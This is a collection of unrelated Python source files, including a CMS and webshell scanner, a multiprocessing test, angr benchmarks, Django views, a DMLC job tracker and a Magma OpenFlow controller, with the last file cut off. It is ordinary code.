| source | python |
|---|---|
CMS_manager.py
|
#!/usr/bin/python3
from Analizer import Analizer
from IOC import IOC
from threading import Thread, Lock, active_count
import threading
from requests import head
from requests.exceptions import ConnectionError
from re import search
class CMS_manager:
def __init__(self, url_site=None, verbose=False):
# Dictionary structure -> {"cms_root": [Analizer object (, url_where_the_webshell_was_found)]}
self.cms_dict = {}
self.current_site = url_site
self.lock = Lock()
self.verbose = verbose
self.ioc = IOC(verbose = verbose)
def set_current_site(self, url_site):
self.lock.acquire()
self.current_site = url_site
print("Sitio actual -> " + self.current_site) if self.verbose else None
self.lock.release()
def is_in_dict(self):
self.lock.acquire()
flag = False
print("Buscando en el diccionario -> " + self.current_site) if self.verbose else None
for root_cms in self.cms_dict.keys():
print("\t" + root_cms) if self.verbose else None
flag = root_cms in self.current_site
if flag:
self.lock.release()
return True
# No CMS root was found in the given site URL
self.lock.release()
return False
def analize_thread(self):
temp = Analizer(self.current_site, "/home/proy/Documents/cms.json", verbose=self.verbose)
try:
temp.search_cms()
if temp.cms:
self.lock.acquire()
self.cms_dict[temp.root] = temp
self.lock.release()
except ConnectionError:
pass
finally:
del temp
def analize_it(self):
"""
Method that starts two threads to analyze the URL received from the
crawler, looking for a CMS or for indicators of compromise (webshells and mining software)
"""
if not self.is_in_dict():
Thread(target=self.analize_thread, args=(), daemon=True).start()
Thread(target=self.ioc.new_site, args=(self.current_site,), daemon=True).start()
else:
print(self.current_site + " analized before") if self.verbose else None
def new_url(self, crawl_url):
self.set_current_site(crawl_url)
self.analize_it()
# Performs the rest of the analysis for every element of cms_dict
def traverse_dict(self):
print("Esperando que todos los hilos concluyan") if self.verbose else None
while(active_count() > 1):
pass
for value in list(self.cms_dict.values()):
Thread(target=value.get_last_info, args=(), daemon=True).start()
if __name__ == "__main__":
ll = ["http://localhost/drupal", "http://localhost/wordpress", "http://localhost/joomla", "https://www.malware.unam.mx"]
#ll2 = ["http://localhost/drupal", "http://localhost/wordpress", "http://localhost/joomla", "http://localhost/wordpress/index.php/2019/11/04/hello-world/"]
aa = CMS_manager(verbose=True)
for ur in ll:
aa.set_current_site(ur)
aa.analize_it()
aa.traverse_dict()
while(active_count() > 1):
pass
for key in aa.cms_dict.keys():
print("################")
print(aa.cms_dict[key].root)
print(aa.cms_dict[key].cms)
print(aa.cms_dict[key].version)
print(aa.cms_dict[key].installed_plugins)
print(aa.cms_dict[key].installed_themes)
#aa.set_current_site("http://localhost/wordpress/index.php/2019/11/04/hello-world/")
#aa.analize_it()
|
mp_fork_bomb.py
|
import multiprocessing
def foo(conn):
conn.send("123")
# Because "if __name__ == '__main__'" is missing this will not work
# correctly on Windows. However, we should get a RuntimeError rather
# than the Windows equivalent of a fork bomb.
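# A guarded variant (hypothetical sketch) that would also work under the
# Windows "spawn" start method would wrap the code below like:
#
#     if __name__ == '__main__':
#         r, w = multiprocessing.Pipe(False)
#         p = multiprocessing.Process(target=foo, args=(w,))
#         p.start()
#         ...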
r, w = multiprocessing.Pipe(False)
p = multiprocessing.Process(target=foo, args=(w,))
p.start()
w.close()
print(r.recv())
r.close()
p.join()
|
manual_performance.py
|
#!/usr/bin/env python
import angr
import argparse
import sys
import time
import os
import math
import random
import resource
import multiprocessing
from tabulate import tabulate
from os.path import join, dirname, realpath
from progressbar import ProgressBar, Percentage, Bar
test_location = str(join(dirname(realpath(__file__)), '../../binaries/tests'))
class Timer(object):
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, *args):
self.end = time.time()
self.msecs = (self.end - self.start) * 1000
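# Usage sketch: `with Timer() as t: run_test()`; the elapsed milliseconds are
# then available as t.msecs once the block exits.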
def mean(r):
return 0. if not r else float(sum(r)) / len(r)
def std(r):
average = mean(r)
return math.sqrt(float(sum(pow(x - average, 2) for x in r)) / len(r))
def print_results(tests):
table_runs = []
table_mems = []
for name, test in tests.items():
runs = test['runs']
table_runs.append([name, str(min(runs)), str(max(runs)), str(mean(runs)), str(std(runs))])
for name, test in tests.items():
mems = test['mems']
table_mems.append([name, str(min(mems)), str(max(mems)), str(mean(mems)), str(std(mems))])
header = ['name', 'min', 'max', 'avg', 'std']
print('Timing (in milliseconds)')
print(tabulate(table_runs, headers=header))
print('Maximum RAM usage (in MB)')
print(tabulate(table_mems, headers=header))
def run_counter(path):
p = angr.Project(path)
sm = p.factory.simgr()
sm.run(n=500)
def run_cfg_analysis(path):
load_options = {}
load_options['auto_load_libs'] = False
p = angr.Project(path,
load_options=load_options,
translation_cache=True
)
p.analyses.CFGAccurate()
def time_one(args, test, queue):
filepath = test['filepath']
func = test['test_func']
random.seed(args.seed)
with Timer() as t:
func(filepath)
queue.put(t.msecs)
queue.put(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / 1000.0)
parser = argparse.ArgumentParser(description='angr performance tests')
parser.add_argument(
'-n', '--n-runs', default=100, type=int,
help='How many runs to perform for each test (default: 100)')
parser.add_argument(
'-s', '--seed', default=1234, type=int,
help='Seed for random (default: 1234)')
args = parser.parse_args()
tests = {
'fauxware_cfg_i386': {
'filepath': join(test_location, 'i386', 'fauxware'),
'test_func': run_cfg_analysis
}
}
# Add counter tests
arch_counter = [
'i386',
'armel',
'armhf',
'i386',
'mips',
'mipsel',
'ppc',
'ppc64',
'x86_64',
]
for arch in arch_counter:
tests['counter_' + arch] = {
'filepath': join(test_location, arch, 'counter'),
'test_func': run_counter
}
print('Seed: ' + str(args.seed))
print('N runs: ' + str(args.n_runs))
queue = multiprocessing.Queue()
for test in tests:
runs = []
mems = []
widgets = ['',
Percentage(), ' ',
Bar()
]
print(test)
pbar = ProgressBar(maxval=args.n_runs, widgets=widgets).start()
for i in range(0, args.n_runs):
p = multiprocessing.Process(target=time_one, args=(args, tests[test], queue))
p.start()
p.join()
runs.append(queue.get())
mems.append(queue.get())
pbar.update(i + 1)
print('')
tests[test]['runs'] = runs
tests[test]['mems'] = mems
print_results(tests)
|
views.py
|
from django.shortcuts import render
from django.views import generic
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
import threading
from Resumes.utils import post_resumes_notify_email, post_articel_notify_email
from .models import UserInfo, Skill, Record, Function, Education, Project
class IndexView(generic.ListView):
template_name = 'index.html'
http_method_names = ['get']
model = UserInfo
def get_context_data(self, *, object_list=None, **kwargs):
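# Send the resume-view notification email from a background thread so that
# rendering the index page is not blocked by the email delivery.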
t = threading.Thread(target=post_resumes_notify_email, name='post_resumes_notify_email', args=(self.request,))
t.start()
kwargs = super(IndexView,self).get_context_data(**kwargs)
user = UserInfo.objects.all()[0]
skills = Skill.objects.filter(user_id=user.id).order_by('id')
record_list = list()
records = Record.objects.filter(user_id=user.id).order_by('-start_time')
for record in records:
record_dict = dict()
functs = Function.objects.filter(record_id=record.id)
record_dict['record'] = record
record_dict['function'] = functs
record_list.append(record_dict)
education_list = Education.objects.filter(user_id=user.id)
project_list = Project.objects.filter(user_id=user.id).order_by('id')
kwargs['user'] = user
kwargs['skills'] = skills
kwargs['record_list'] = record_list
kwargs['education_list'] = education_list
kwargs['project_list'] = project_list
return kwargs
class APIView(generic.ListView):
http_method_names = ['post']
@csrf_exempt  # prevent 403 errors on POST requests (skip the CSRF check)
def post(self, request, *args, **kwargs):
urlpath = request.POST['urlpath']
title = request.POST['title']
userAgent = request.META.get('HTTP_USER_AGENT', None)
t = threading.Thread(target=post_articel_notify_email, name='post_articel_notify_email', args=(userAgent, urlpath, title))
t.start()
response = HttpResponse(b'{"code":"1000", "msg":"success", "body":{}}',content_type='application/json')
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
|
tracker.py
|
"""
Tracker script for DMLC
Implements the tracker control protocol
- start dmlc jobs
- start ps scheduler and rabit tracker
- help nodes to establish links with each other
Tianqi Chen
"""
import sys
import os
import socket
import struct
import subprocess
import time
import logging
import random
from threading import Thread
"""
Extension of socket to handle recv and send of special data
"""
class ExSocket:
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
sock = self.sock
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return ''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
def sendstr(self, s):
self.sendint(len(s))
self.sock.sendall(s)
def recvstr(self):
slen = self.recvint()
return self.recvall(slen)
# magic number used to verify existence of data
kMagic = 0xff99
class SlaveEntry:
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = socket.gethostbyname(s_addr[0])
magic = slave.recvint()
assert magic == kMagic, 'invalid magic number=%d from %s' % (magic, self.host)
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
# send the rprev and next link
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev != -1 and rprev != rank:
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext != -1 and rnext != rank:
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
for i in xrange(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
# all connections were successfully set up
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker:
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port = 9091, port_end = 9999):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind((hostIP, port))
self.port = port
break
except socket.error:
continue
sock.listen(16)
self.sock = sock
self.hostIP = hostIP
logging.info('start listen on %s:%d' % (hostIP, self.port))
def __del__(self):
self.sock.close()
def slave_envs(self):
"""
get environment variables for slaves
can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
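# get_neighbor/get_tree lay the ranks out as a binary heap: rank r has parent
# floor((r - 1) / 2) and children 2*r + 1 and 2*r + 2 (when they are < nslave).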
def get_neighbor(self, rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank / 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
parent_map[r] = (r + 1) / 2 - 1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree
return a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if len(cset) == 0:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
def get_link_map(self, nslave):
"""
get the link map; this is a bit hacky, a better algorithm is called for
to place similar nodes together
"""
tree_map, parent_map = self.get_tree(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0 : 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
ring_map_ = {}
tree_map_ = {}
parent_map_ ={}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def handle_print(self,slave, msg):
logging.info(msg.strip())
sys.stdout.write(msg)
sys.stdout.flush()
def accept_slaves(self, nslave):
# set of nodes that have finished the job
shutdown = {}
# set of nodes that are waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
# list of workers that are pending rank assignment
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
self.handle_print(s, msg)
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
logging.debug('Receive %s signal from %d' % (s.cmd, s.rank))
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map is None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
# set of nodes that are pending to start up
todo_nodes = range(nslave)
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert len(todo_nodes) != 0
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key = lambda x : x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.debug('Receive %s signal from %s; assign rank %d' % (s.cmd, s.host, s.rank))
if len(todo_nodes) == 0:
logging.info('@tracker All of %d nodes getting started' % nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
logging.debug('Receive %s signal from %d' % (s.cmd, s.rank))
if s.wait_accept > 0:
wait_conn[rank] = s
logging.info('@tracker All nodes finishes job')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish' % str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target = run, args = ())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
while self.thread.isAlive():
self.thread.join(100)
class PSTracker:
"""Start the schduler node in PS
"""
def __init__(self, hostIP, cmd, port = 9091, port_end = 9999, envs = {}):
"""
Starts the PS scheduler
"""
self.cmd = cmd
if cmd is None:
return
self.hostIP = hostIP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
max_retry = 100
for i in range(0, max_retry):
if i + 1 == max_retry:
raise Exception('the scheduler failed to bind a port')
port = random.randint(port, port_end)
try:
sock.bind(('', port))
self.port = port
sock.close()
break
except socket.error:
continue
env = os.environ.copy()
env['DMLC_ROLE'] = 'scheduler'
env['DMLC_PS_ROOT_URI'] = str(self.hostIP)
env['DMLC_PS_ROOT_PORT'] = str(self.port)
for k, v in envs.items():
env[k] = str(v)
self.thread = Thread(target = (lambda : subprocess.check_call(self.cmd, env=env, shell=True)), args = ())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
if self.cmd is not None:
while self.thread.isAlive():
self.thread.join(100)
def slave_envs(self):
if self.cmd is None:
return {}
else:
return {'DMLC_PS_ROOT_URI': self.hostIP,
'DMLC_PS_ROOT_PORT': self.port}
def submit(nworker, nserver, fun_submit, hostIP = 'auto', pscmd = None):
"""submit job
Parameters
----------
nworker : int
number of workers
nserver : int
number of servers, if 0 then submit as a rabit job, otherwise submit as
a parameter server job
fun_submit : func
the function to submit the jobs for servers and workers
hostIP : str, optional
the host ip of the root node
pscmd : str, optional
command used to launch the parameter server scheduler, if any
"""
# get the root node ip
if hostIP == 'auto':
hostIP = 'ip'
if hostIP == 'dns':
hostIP = socket.getfqdn()
elif hostIP == 'ip':
from socket import gaierror
try:
hostIP = socket.gethostbyname(socket.getfqdn())
except gaierror:
logging.warn('gethostbyname(socket.getfqdn()) failed... trying on hostname()')
hostIP = socket.gethostbyname(socket.gethostname())
if hostIP.startswith("127."):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# doesn't have to be reachable
s.connect(('10.255.255.255', 0))
hostIP = s.getsockname()[0]
envs = {'DMLC_NUM_WORKER' : nworker,
'DMLC_NUM_SERVER' : nserver}
# start the root
if nserver == 0:
rabit = RabitTracker(hostIP = hostIP, nslave = nworker)
envs.update(rabit.slave_envs())
rabit.start(nworker)
else:
pserver = PSTracker(hostIP = hostIP, cmd=pscmd, envs = envs)
envs.update(pserver.slave_envs())
# start the workers and servers
fun_submit(nworker, nserver, envs)
# wait the root finished
if nserver == 0:
rabit.join()
else:
pserver.join()
def config_logger(args):
FORMAT = '%(asctime)s %(levelname)s %(message)s'
level = args.log_level if 'log_level' in args else 'DEBUG'
level = getattr(logging, level)
if 'log_file' not in args or args.log_file is None:
logging.basicConfig(format=FORMAT, level = level)
else:
logging.basicConfig(format=FORMAT, level = level, filename = args.log_file)
console = logging.StreamHandler()
console.setFormatter(logging.Formatter(FORMAT))
console.setLevel(level)
logging.getLogger('').addHandler(console)
|
ue_mac.py
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
"""
import threading
from typing import List
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, set_ev_cls
from ryu.lib.packet import packet
from ryu.lib.packet import ether_types, dhcp
from ryu.ofproto.inet import IPPROTO_TCP, IPPROTO_UDP
from lte.protos.pipelined_pb2 import FlowResponse, SetupFlowsResult, \
UEMacFlowRequest
from magma.pipelined.app.base import MagmaController, ControllerType
from magma.pipelined.app.inout import INGRESS
from magma.pipelined.directoryd_client import update_record
from magma.pipelined.imsi import encode_imsi, decode_imsi
from magma.pipelined.openflow import flows
from magma.pipelined.app.ipfix import IPFIXController
from magma.pipelined.bridge_util import BridgeTools
from magma.pipelined.openflow.exceptions import MagmaOFError
from magma.pipelined.openflow.magma_match import MagmaMatch
from magma.pipelined.openflow.registers import IMSI_REG, load_passthrough
class UEMacAddressController(MagmaController):
"""
UE MAC Address Controller
This controller controls table 0 which is the first table every packet
touches. It matches on UE MAC address and sets IMSI metadata
"""
APP_NAME = "ue_mac"
APP_TYPE = ControllerType.SPECIAL
def __init__(self, *args, **kwargs):
super(UEMacAddressController, self).__init__(*args, **kwargs)
self.tbl_num = self._service_manager.get_table_num(self.APP_NAME)
self.next_table = \
self._service_manager.get_table_num(INGRESS)
self.arpd_controller_fut = kwargs['app_futures']['arpd']
self.arp_contoller = None
self._datapath = None
tbls = self._service_manager.allocate_scratch_tables(self.APP_NAME, 2)
self._passthrough_set_tbl = tbls[0]
self._dhcp_learn_scratch = tbls[1]
self._li_port = None
self._imsi_set_tbl_num = \
self._service_manager.INTERNAL_IMSI_SET_TABLE_NUM
self._ipfix_sample_tbl_num = \
self._service_manager.INTERNAL_IPFIX_SAMPLE_TABLE_NUM
self._app_set_tbl_num = self._service_manager.INTERNAL_APP_SET_TABLE_NUM
if 'li_local_iface' in kwargs['config']:
self._li_port = \
BridgeTools.get_ofport(kwargs['config']['li_local_iface'])
self._dpi_port = \
BridgeTools.get_ofport(kwargs['config']['dpi']['mon_port'])
def initialize_on_connect(self, datapath):
self.delete_all_flows(datapath)
self._datapath = datapath
self._install_default_flows()
def cleanup_on_disconnect(self, datapath):
self.delete_all_flows(datapath)
def handle_restart(self, ue_requests: List[UEMacFlowRequest]
) -> SetupFlowsResult:
"""
Setup current check quota flows.
"""
# TODO Potentially we can run a diff logic but I don't think there is
# benefit(we don't need stats here)
self.delete_all_flows(self._datapath)
self._install_default_flows()
for ue_req in ue_requests:
self.add_ue_mac_flow(ue_req.sid.id, ue_req.mac_addr)
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.handle_restart(ue_requests)
self.init_finished = True
return SetupFlowsResult(result=SetupFlowsResult.SUCCESS)
def delete_all_flows(self, datapath):
flows.delete_all_flows_from_table(datapath, self.tbl_num)
flows.delete_all_flows_from_table(datapath, self._passthrough_set_tbl)
flows.delete_all_flows_from_table(datapath, self._dhcp_learn_scratch)
flows.delete_all_flows_from_table(datapath, self._imsi_set_tbl_num)
def add_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return FlowResponse(result=FlowResponse.FAILURE)
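# Tag both directions of the UE's traffic: eth_src matches uplink packets and
# eth_dst matches downlink packets; each flow loads the IMSI into the metadata
# register before resubmitting to the passthrough-set table.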
uplink_match = MagmaMatch(eth_src=mac_addr)
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
# For handling internal ipfix pkt sampling
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
next_table=self._ipfix_sample_tbl_num)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
next_table=self._ipfix_sample_tbl_num)
return FlowResponse(result=FlowResponse.SUCCESS)
def delete_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return
uplink_match = MagmaMatch(eth_src=mac_addr)
self._delete_resubmit_flow(sid, uplink_match)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._delete_resubmit_flow(sid, downlink_match)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._delete_resubmit_flow(sid, uplink_match,
tbl_num=self._imsi_set_tbl_num)
self._delete_resubmit_flow(sid, downlink_match,
tbl_num=self._imsi_set_tbl_num)
def add_arp_response_flow(self, imsi, yiaddr, chaddr):
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.add_ue_arp_flows(self._datapath,
yiaddr, chaddr)
self.logger.debug("From DHCP learn: IMSI %s, has ip %s and mac %s",
imsi, yiaddr, chaddr)
# Associate IMSI to IPv4 addr in directory service
threading.Thread(target=update_record, args=(str(imsi),
yiaddr)).start()
else:
self.logger.error("ARPD controller not ready, ARP learn FAILED")
def _add_resubmit_flow(self, sid, match, action=None,
priority=flows.DEFAULT_PRIORITY,
next_table=None, tbl_num=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if next_table is None:
next_table = self.next_table
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
if sid:
actions.append(parser.NXActionRegLoad2(dst=IMSI_REG,
value=encode_imsi(sid)))
flows.add_resubmit_next_service_flow(self._datapath, tbl_num,
match, actions=actions,
priority=priority,
resubmit_table=next_table)
def _delete_resubmit_flow(self, sid, match, action=None, tbl_num=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
actions.append(
parser.NXActionRegLoad2(dst=IMSI_REG, value=encode_imsi(sid)))
flows.delete_flow(self._datapath, tbl_num, match, actions=actions)
def _add_dns_passthrough_flows(self):
parser = self._datapath.ofproto_parser
# Set so packet skips enforcement and send to egress
action = load_passthrough(parser)
# Install UDP flows for DNS
ulink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_dst=53)
self._add_resubmit_flow(None, ulink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=53)
self._add_resubmit_flow(None, dlink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=53)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=53)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS over tls
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=853)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=853)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
def _add_dhcp_passthrough_flows(self):
ofproto, parser = self._datapath.ofproto, self._datapath.ofproto_parser
# Set so packet skips enforcement controller
action = load_passthrough(parser)
uplink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=68,
udp_dst=67)
self._add_resubmit_flow(None, uplink_match, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=67,
udp_dst=68)
# Set so triggers packetin and we can learn the ip to do arp response
self._add_resubmit_flow(None, downlink_match, action,
flows.PASSTHROUGH_PRIORITY, next_table=self._dhcp_learn_scratch,
tbl_num=self._passthrough_set_tbl)
# Install default flow for dhcp learn scratch
flows.add_output_flow(self._datapath, self._dhcp_learn_scratch,
match=MagmaMatch(), actions=[],
priority=flows.PASSTHROUGH_PRIORITY,
output_port=ofproto.OFPP_CONTROLLER,
copy_table=self.next_table,
max_len=ofproto.OFPCML_NO_BUFFER)
def _add_uplink_arp_allow_flow(self):
arp_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_ARP)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
arp_match, actions=[],
priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _learn_arp_entry(self, ev):
"""
Learn action to process PacketIn DHCP packets, dhcp ack packets will
be used to learn the ARP entry for the UE to install rules in the arp
table. The DHCP packets will then be sent through the pipeline.
"""
msg = ev.msg
if self._dhcp_learn_scratch != msg.table_id:
# Intended for other application
return
try:
encoded_imsi = _get_encoded_imsi_from_packetin(msg)
# Decode the imsi to properly save in directoryd
imsi = decode_imsi(encoded_imsi)
except MagmaOFError as e:
# No packet direction, but intended for this table
self.logger.error("Error obtaining IMSI from pkt-in: %s", e)
return
pkt = packet.Packet(msg.data)
dhcp_header = pkt.get_protocols(dhcp.dhcp)[0]
# DHCP yiaddr is the client(UE) ip addr
# chaddr is the client mac address
self.add_arp_response_flow(imsi, dhcp_header.yiaddr, dhcp_header.chaddr)
def _install_default_flows(self):
"""
Install default flows
"""
# Allows arp packets from uplink(no eth dst set) to go to the arp table
self._add_uplink_arp_allow_flow()
self._add_dhcp_passthrough_flows()
self._add_dns_passthrough_flows()
self._add_resubmit_flow(None, MagmaMatch(),
priority=flows.MINIMUM_PRIORITY,
tbl_num=self._passthrough_set_tbl)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(None, MagmaMatch(in_port=self._dpi_port),
priority=flows.PASSTHROUGH_PRIORITY,
next_table=self._app_set_tbl_num)
if self._li_port:
match = MagmaMatch(in_port=self._li_port)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
match, actions=[], priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
# TODO We might want a default drop all rule with min priority, but
# adding it breaks all unit tests for this controller (needs work)
def _get_encoded_imsi_from_packetin(msg):
"""
Retrieve encoded imsi from the Packet-In message, or raise an exception if
it doesn't exist.
"""
imsi = msg.match.get(IMSI_REG)
if imsi is None:
raise MagmaOFError('IMSI not found in OFPMatch')
return imsi
|
monitorConnectors.py
|
"""
Created on Feb 11 10:32 2020
@author: nishit
"""
import threading
import time
from IO.monitorPub import MonitorPub
from utils_intern.messageLogger import MessageLogger
logger = MessageLogger.get_logger_parent(parent="connector")
class MonitorConnectors:
def __init__(self, config):
self.status = {}
self.ping_frequency = config.getint("IO", "ping.frequency")
self.monitor = MonitorPub(config, id="connector")
